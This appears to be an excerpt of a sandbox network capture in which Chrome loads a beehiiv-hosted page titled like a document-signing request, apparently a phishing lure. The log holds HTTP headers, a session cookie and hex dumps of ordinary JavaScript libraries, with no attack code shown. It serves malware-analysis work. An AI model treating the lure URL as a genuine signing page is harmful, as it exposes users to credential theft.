                                                                                                                                            2025-01-15 18:14:32 UTC680INData Raw: d7 6c 58 bd 27 26 da 26 4f dd 59 18 a6 87 5b 6a 34 a7 d5 89 27 0d c3 d4 3e b0 7f 0f 55 3d c5 11 21 20 54 bc 10 6f 11 5f a0 24 01 ff fd b2 07 5a 56 b3 94 5c 39 aa 37 f2 1f ef 14 46 b2 7a 51 07 f0 a2 25 64 f0 a8 03 b4 39 b2 6d 65 86 26 01 ee b3 f3 59 11 6e 18 d3 65 8d d9 81 d9 38 27 fd 19 1b 80 d4 6b 5c 94 d8 9f e5 ea 9c fe 78 0b a8 60 3b 85 68 71 99 ac 41 3e da ff 81 33 4f 9d 54 b7 15 65 3f 2b 6c 70 fa 3c 57 0b ec de 08 37 d8 2c 30 46 8a 11 67 43 f1 46 3c 75 0c ce e8 82 bf 85 0b 04 ed 85 1b ba 58 c4 6b bc 1f 30 88 1f 7c 80 05 21 c2 6b d5 f6 ed da b7 dc 77 83 9f 8e 67 65 83 3b aa 12 ef 35 43 e5 d8 a4 11 25 56 27 87 d1 d7 ee b9 c4 30 a2 07 ab 48 11 f2 95 36 d3 7f 95 19 d6 54 c7 bf f1 32 06 06 48 f6 3e ff 31 14 a0 73 93 8b e0 f3 56 ff eb 70 a3 5f 62 5b 73 fa
                                                                                                                                            Data Ascii: lX'&&OY[j4'>U=! To_$ZV\97FzQ%d9me&Yne8'k\x`;hqA>3OTe?+lp<W7,0FgCF<uXk0|!kwge;5C%V'0H6T2H>1sVp_b[s


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.1649711104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC845OUTGET /assets/AppGlobals-2Br-8bZs.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 32343
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"7e57-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d894fd39729e-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 63 36 64 33 38 34 61 2d 33 61 30 64 2d 35 38 62 31 2d 38 35 63 66 2d 62 65 66 63 37 63 31 66 61 32 64 35 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6d384a-3a0d-58b1-85cf-befc7c1fa2d5")}catch(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 65 74 75 72 6e 21 30 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 46 28 74 2c 45 72 72 6f 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 45 74 2e 63 61 6c 6c 28 74 29 3d 3d 3d 60 5b 6f 62 6a 65 63 74 20 24 7b 65 7d 5d 60 7d 66 75 6e 63 74 69 6f 6e 20 63 6e 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 45 72 72 6f 72 45 76 65 6e 74 22 29 7d 66 75 6e 63 74 69 6f 6e 20 75 6e 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 44 4f 4d 45 72 72 6f 72 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 6e 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 44 4f 4d 45 78 63 65 70 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 53 74 72 69 6e 67 22 29 7d 66 75 6e 63 74 69 6f 6e 20 50 74 28 74
                                                                                                                                            Data Ascii: eturn!0;default:return F(t,Error)}}function k(t,e){return Et.call(t)===`[object ${e}]`}function cn(t){return k(t,"ErrorEvent")}function un(t){return k(t,"DOMError")}function fn(t){return k(t,"DOMException")}function U(t){return k(t,"String")}function Pt(t
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 69 73 3b 66 75 6e 63 74 69 6f 6e 20 57 28 74 2c 65 2c 6e 29 7b 63 6f 6e 73 74 20 72 3d 67 2c 73 3d 72 2e 5f 5f 53 45 4e 54 52 59 5f 5f 3d 72 2e 5f 5f 53 45 4e 54 52 59 5f 5f 7c 7c 7b 7d 2c 69 3d 73 5b 77 5d 3d 73 5b 77 5d 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 69 5b 74 5d 7c 7c 28 69 5b 74 5d 3d 65 28 29 29 7d 63 6f 6e 73 74 20 43 3d 67 2c 47 74 3d 38 30 3b 66 75 6e 63 74 69 6f 6e 20 24 74 28 74 2c 65 3d 7b 7d 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 3b 74 72 79 7b 6c 65 74 20 6e 3d 74 3b 63 6f 6e 73 74 20 72 3d 35 2c 73 3d 5b 5d 3b 6c 65 74 20 69 3d 30 2c 6f 3d 30 3b 63 6f 6e 73 74 20 61 3d 22 20 3e 20 22 2c 63 3d 61 2e 6c 65 6e 67 74 68 3b 6c 65 74 20 75 3b 63 6f 6e 73 74 20 64 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28
                                                                                                                                            Data Ascii: is;function W(t,e,n){const r=g,s=r.__SENTRY__=r.__SENTRY__||{},i=s[w]=s[w]||{};return i[t]||(i[t]=e())}const C=g,Gt=80;function $t(t,e={}){if(!t)return"<unknown>";try{let n=t;const r=5,s=[];let i=0,o=0;const a=" > ",c=a.length;let u;const d=Array.isArray(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 20 65 3d 74 3b 63 6f 6e 73 74 20 6e 3d 35 3b 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 6e 3b 72 2b 2b 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 7b 69 66 28 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 43 6f 6d 70 6f 6e 65 6e 74 29 72 65 74 75 72 6e 20 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 43 6f 6d 70 6f 6e 65 6e 74 3b 69 66 28 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 45 6c 65 6d 65 6e 74 29 72 65 74 75 72 6e 20 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 45 6c 65 6d 65 6e 74 7d 65 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 63 6f 6e 73 74 20 58 3d 74 79 70 65 6f 66 20 5f 5f 53 45 4e 54 52 59 5f 44
                                                                                                                                            Data Ascii: e=t;const n=5;for(let r=0;r<n;r++){if(!e)return null;if(e instanceof HTMLElement){if(e.dataset.sentryComponent)return e.dataset.sentryComponent;if(e.dataset.sentryElement)return e.dataset.sentryElement}e=e.parentNode}return null}const X=typeof __SENTRY_D
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 63 74 28 74 29 7d 3b 69 66 28 77 74 28 74 29 29 7b 63 6f 6e 73 74 20 65 3d 7b 74 79 70 65 3a 74 2e 74 79 70 65 2c 74 61 72 67 65 74 3a 61 74 28 74 2e 74 61 72 67 65 74 29 2c 63 75 72 72 65 6e 74 54 61 72 67 65 74 3a 61 74 28 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 2e 2e 2e 63 74 28 74 29 7d 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 43 75 73 74 6f 6d 45 76 65 6e 74 3c 22 75 22 26 26 46 28 74 2c 43 75 73 74 6f 6d 45 76 65 6e 74 29 26 26 28 65 2e 64 65 74 61 69 6c 3d 74 2e 64 65 74 61 69 6c 29 2c 65 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 4c 74 28 74 29 3f 24 74 28 74 29 3a 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c
                                                                                                                                            Data Ascii: ct(t)};if(wt(t)){const e={type:t.type,target:at(t.target),currentTarget:at(t.currentTarget),...ct(t)};return typeof CustomEvent<"u"&&F(t,CustomEvent)&&(e.detail=t.detail),e}else return t}function at(t){try{return Lt(t)?$t(t):Object.prototype.toString.call
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 28 63 2e 6c 65 6e 67 74 68 3e 31 30 32 34 29 63 6f 6e 74 69 6e 75 65 3b 63 6f 6e 73 74 20 75 3d 75 74 2e 74 65 73 74 28 63 29 3f 63 2e 72 65 70 6c 61 63 65 28 75 74 2c 22 24 31 22 29 3a 63 3b 69 66 28 21 75 2e 6d 61 74 63 68 28 2f 5c 53 2a 45 72 72 6f 72 3a 20 2f 29 29 7b 66 6f 72 28 63 6f 6e 73 74 20 64 20 6f 66 20 65 29 7b 63 6f 6e 73 74 20 66 3d 64 28 75 29 3b 69 66 28 66 29 7b 69 2e 70 75 73 68 28 66 29 3b 62 72 65 61 6b 7d 7d 69 66 28 69 2e 6c 65 6e 67 74 68 3e 3d 54 74 2b 73 29 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 56 74 28 69 2e 73 6c 69 63 65 28 73 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 6e 28 74 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 4b 74 28 2e 2e 2e 74 29 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 56 74 28
                                                                                                                                            Data Ascii: (c.length>1024)continue;const u=ut.test(c)?c.replace(ut,"$1"):c;if(!u.match(/\S*Error: /)){for(const d of e){const f=d(u);if(f){i.push(f);break}}if(i.length>=Tt+s)break}}return Vt(i.slice(s))}}function bn(t){return Array.isArray(t)?Kt(...t):t}function Vt(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6f 6e 20 6e 28 73 29 7b 69 66 28 74 29 72 65 74 75 72 6e 20 65 2e 68 61 73 28 73 29 3f 21 30 3a 28 65 2e 61 64 64 28 73 29 2c 21 31 29 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 69 66 28 65 5b 69 5d 3d 3d 3d 73 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 73 29 2c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 72 28 73 29 7b 69 66 28 74 29 65 2e 64 65 6c 65 74 65 28 73 29 3b 65 6c 73 65 20 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 69 66 28 65 5b 69 5d 3d 3d 3d 73 29 7b 65 2e 73 70 6c 69 63 65 28 69 2c 31 29 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 5b 6e 2c 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 63 6f 6e 73 74 20 74 3d 67 2c 65 3d 74 2e 63 72 79 70 74
                                                                                                                                            Data Ascii: on n(s){if(t)return e.has(s)?!0:(e.add(s),!1);for(let i=0;i<e.length;i++)if(e[i]===s)return!0;return e.push(s),!1}function r(s){if(t)e.delete(s);else for(let i=0;i<e.length;i++)if(e[i]===s){e.splice(i,1);break}}return[n,r]}function p(){const t=g,e=t.crypt
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 62 6c 65 2a 2a 20 28 24 7b 72 7d 29 60 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 74 2c 65 3d 33 2c 6e 3d 31 30 30 2a 31 30 32 34 29 7b 63 6f 6e 73 74 20 72 3d 54 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 69 65 28 72 29 3e 6e 3f 65 65 28 74 2c 65 2d 31 2c 6e 29 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 2c 65 2c 6e 3d 31 2f 30 2c 72 3d 31 2f 30 2c 73 3d 5a 74 28 29 29 7b 63 6f 6e 73 74 5b 69 2c 6f 5d 3d 73 3b 69 66 28 65 3d 3d 6e 75 6c 6c 7c 7c 5b 22 6e 75 6d 62 65 72 22 2c 22 62 6f 6f 6c 65 61 6e 22 2c 22 73 74 72 69 6e 67 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 79 70 65 6f 66 20 65 29 26 26 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 65 29 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 61 3d 6e 65 28 74 2c 65 29 3b 69 66 28 21 61 2e 73 74 61 72 74 73 57
                                                                                                                                            Data Ascii: ble** (${r})`}}}function ee(t,e=3,n=100*1024){const r=T(t,e);return ie(r)>n?ee(t,e-1,n):r}function H(t,e,n=1/0,r=1/0,s=Zt()){const[i,o]=s;if(e==null||["number","boolean","string"].includes(typeof e)&&!Number.isNaN(e))return e;const a=ne(t,e);if(!a.startsW
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 63 6f 6e 73 74 20 6e 3d 72 65 28 65 29 3b 72 65 74 75 72 6e 2f 5e 48 54 4d 4c 28 5c 77 2a 29 45 6c 65 6d 65 6e 74 24 2f 2e 74 65 73 74 28 6e 29 3f 60 5b 48 54 4d 4c 45 6c 65 6d 65 6e 74 3a 20 24 7b 6e 7d 5d 60 3a 60 5b 6f 62 6a 65 63 74 20 24 7b 6e 7d 5d 60 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 60 2a 2a 6e 6f 6e 2d 73 65 72 69 61 6c 69 7a 61 62 6c 65 2a 2a 20 28 24 7b 6e 7d 29 60 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 74 29 7b 63 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 3a 22 6e 75 6c 6c 20 70 72 6f 74 6f 74 79 70 65 22 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 74 29 7b 72 65 74 75 72 6e 7e 2d 65 6e 63 6f 64 65
                                                                                                                                            Data Ascii: const n=re(e);return/^HTML(\w*)Element$/.test(n)?`[HTMLElement: ${n}]`:`[object ${n}]`}catch(n){return`**non-serializable** (${n})`}}function re(t){const e=Object.getPrototypeOf(t);return e?e.constructor.name:"null prototype"}function se(t){return~-encode
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 73 2e 5f 73 74 61 74 65 3d 65 2c 74 68 69 73 2e 5f 76 61 6c 75 65 3d 6e 2c 74 68 69 73 2e 5f 65 78 65 63 75 74 65 48 61 6e 64 6c 65 72 73 28 29 7d 7d 7d 5f 5f 69 6e 69 74 34 28 29 7b 74 68 69 73 2e 5f 65 78 65 63 75 74 65 48 61 6e 64 6c 65 72 73 3d 28 29 3d 3e 7b 69 66 28 74 68 69 73 2e 5f 73 74 61 74 65 3d 3d 3d 79 2e 50 45 4e 44 49 4e 47 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 73 2e 73 6c 69 63 65 28 29 3b 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 73 3d 5b 5d 2c 65 2e 66 6f 72 45 61 63 68 28 6e 3d 3e 7b 6e 5b 30 5d 7c 7c 28 74 68 69 73 2e 5f 73 74 61 74 65 3d 3d 3d 79 2e 52 45 53 4f 4c 56 45 44 26 26 6e 5b 31 5d 28 74 68 69 73 2e 5f 76 61 6c 75 65 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 3d 3d 3d 79 2e 52 45 4a
                                                                                                                                            Data Ascii: s._state=e,this._value=n,this._executeHandlers()}}}__init4(){this._executeHandlers=()=>{if(this._state===y.PENDING)return;const e=this._handlers.slice();this._handlers=[],e.forEach(n=>{n[0]||(this._state===y.RESOLVED&&n[1](this._value),this._state===y.REJ


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.16497183.5.3.194436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC575OUTGET /pixel-js.js HTTP/1.1
                                                                                                                                            Host: beehiiv-adnetwork-production.s3.amazonaws.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:32 UTC484INHTTP/1.1 200 OK
                                                                                                                                            x-amz-id-2: eQ13uiJQHodP2LIyocET+Eq5cRvx1R3r41fTZXJpOFYtOtB2r6qh1V+74xivmE32299a6z+lTSILnsSZLpn/7g==
                                                                                                                                            x-amz-request-id: 4XGF8C2HAR8TMYQX
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Last-Modified: Tue, 14 Jan 2025 21:36:24 GMT
                                                                                                                                            ETag: "c0e127164e594201e27bf23c83596835"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            x-amz-version-id: DC.LDwZ74kg3aPa9nJ0RfCCkAkac1qzD
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Type: text/javascript
                                                                                                                                            Content-Length: 8364
                                                                                                                                            Server: AmazonS3
                                                                                                                                            Connection: close
                                                                                                                                            2025-01-15 18:14:32 UTC8364INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 6c 65 74 20 6c 6f 67 20 3d 20 28 29 20 3d 3e 20 7b 0a 20 20 7d 3b 0a 20 20 63 6f 6e 73 74 20 41 50 49 41 52 59 5f 45 4e 44 50 4f 49 4e 54 20 3d 20 22 68 74 74 70 73 3a 2f 2f 69 6e 67 65 73 74 69 6f 6e 2e 61 70 69 61 72 79 2e 62 65 65 68 69 69 76 2e 6e 65 74 2f 61 70 69 2f 76 31 2f 69 6e 67 65 73 74 69 6f 6e 2f 70 69 78 65 6c 22 3b 0a 20 20 63 6f 6e 73 74 20 41 44 4e 45 54 57 4f 52 4b 5f 45 4e 44 50 4f 49 4e 54 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 64 6e 65 74 77 6f 72 6b 2e 62 65 65 68 69 69 76 2e 63 6f 6d 22 3b 0a 20 20 6c 65 74 20 69 73 53 65 63 75 72 65 20 3d 20 74 72 75 65 3b 0a 20 20 69 66 20 28 41 50 49 41 52 59 5f 45 4e 44 50 4f 49 4e 54 2e 69 6e 63 6c 75 64 65 73 28 22 64 65 76 22 29 29 20 7b 0a 20
                                                                                                                                            Data Ascii: (function() { let log = () => { }; const APIARY_ENDPOINT = "https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixel"; const ADNETWORK_ENDPOINT = "https://adnetwork.beehiiv.com"; let isSecure = true; if (APIARY_ENDPOINT.includes("dev")) {


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.1649720104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC844OUTGET /assets/dayjs.min-B8CfgAhU.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC913INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 7502
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1d4e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8967af6c33a-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC456INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 37 35 39 39 62 38 63 2d 66 62 31 36 2d 35 64 34 36 2d 38 35 66 32 2d 38 38 35 31 39 63 61 62 66 38 30 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="77599b8c-fb16-5d46-85f2-88519cabf801")}catch(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 22 2c 53 3d 22 73 65 63 6f 6e 64 22 2c 77 3d 22 6d 69 6e 75 74 65 22 2c 4f 3d 22 68 6f 75 72 22 2c 4d 3d 22 64 61 79 22 2c 48 3d 22 77 65 65 6b 22 2c 6d 3d 22 6d 6f 6e 74 68 22 2c 4a 3d 22 71 75 61 72 74 65 72 22 2c 79 3d 22 79 65 61 72 22 2c 5f 3d 22 64 61 74 65 22 2c 5a 3d 22 49 6e 76 61 6c 69 64 20 44 61 74 65 22 2c 42 3d 2f 5e 28 5c 64 7b 34 7d 29 5b 2d 2f 5d 3f 28 5c 64 7b 31 2c 32 7d 29 3f 5b 2d 2f 5d 3f 28 5c 64 7b 30 2c 32 7d 29 5b 54 74 5c 73 5d 2a 28 5c 64 7b 31 2c 32 7d 29 3f 3a 3f 28 5c 64 7b 31 2c 32 7d 29 3f 3a 3f 28 5c 64 7b 31 2c 32 7d 29 3f 5b 2e 3a 5d 3f 28 5c 64 2b 29 3f 24 2f 2c 47 3d 2f 5c 5b 28 5b 5e 5c 5d 5d 2b 29 5d 7c 59 7b 31 2c 34 7d 7c 4d 7b 31 2c 34 7d 7c 44 7b 31 2c 32 7d 7c 64 7b 31 2c 34 7d 7c 48 7b 31 2c 32 7d 7c 68 7b 31
